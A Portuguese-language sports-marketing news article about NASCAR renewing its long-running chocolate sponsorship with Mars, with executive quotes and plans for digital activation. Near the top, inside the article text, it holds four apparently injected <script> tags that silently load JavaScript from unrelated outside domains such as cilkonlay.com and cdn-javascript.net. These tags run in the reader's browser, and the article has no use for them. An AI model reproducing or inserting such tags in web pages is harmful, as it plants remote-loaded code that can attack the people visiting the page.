Experiência de Marca

Nascar renova patrocínio com marca de chocolates Mars

Multinacional tem em seu portfólio marcas como M&M's, Snickers e Twix<!--EndFragment-->. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573180803086" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Multinacional tem em seu portfólio marcas como M&M's, Snickers e Twix.

A Nascar anunciou no dia 31 de outubro, a renovação do contrato de patrocínio com a Mars. O relacionamento, que teve início em 2000, chegará a mais 20 anos. A duração exata não foi divulgada.

O melhor do marketing esportivo está aqui.

Leia também: Bauducco e Mars lançam Mini Chocottone M&M’s.

De acordo com o novo contrato, a Mars permanece como parceira oficial de chocolates da categoria de turismo americana, com ampla exposição garantida em todas as provas e outros eventos da Nascar.

A empresa ainda poderá continuar utilizando a parceria como uma plataforma para lançar novos produtos. O M&M'S Chocolate Bar, por exemplo, foi lançado nos Estados Unidos usando a Daytona 500, uma das provas mais tradicionais do calendário, como pano de fundo.

A pintura oficial do carro 18, de Kyle Busch, que também é patrocinado pela marca, foi uma ativação que ficou gravada na memória de muitos fãs da categoria.

"Essa parceria nos permite integrar perfeitamente nossas marcas icônicas ao esporte como nenhuma outra liga, e as experiências inovadoras que podemos trazer para o dia da corrida ajudam a criar memórias duradouras para fãs das nossas marcas e fãs do esporte.", destacou William Clements, vice-presidente de patrocínios e marketing esportivo da Mars.

"A Mars está conectada a muitos momentos memoráveis ??da nossa história e sua ampla presença em todo o esporte resultou no fato de que suas marcas são algumas das mais reconhecidas na Nascar. Essa parceria renovada representa a colaboração e a abordagem totalmente integrada que a Mars oferece ano após ano, posicionando suas marcas icônicas como as favoritas do dia da corrida para milhões de fãs leais à nossa categoria.", acrescentou Lou Garate, vice-presidente sênior de marketing da Nascar.

Para o novo ciclo, a multinacional pretende ativar melhor a parceria no mundo digital, em especial nas redes sociais. A marca ainda quer atingir objetivos maiores de marketing com os setores de hospitalidade, relacionamento com as equipes e a mídia de um modo geral.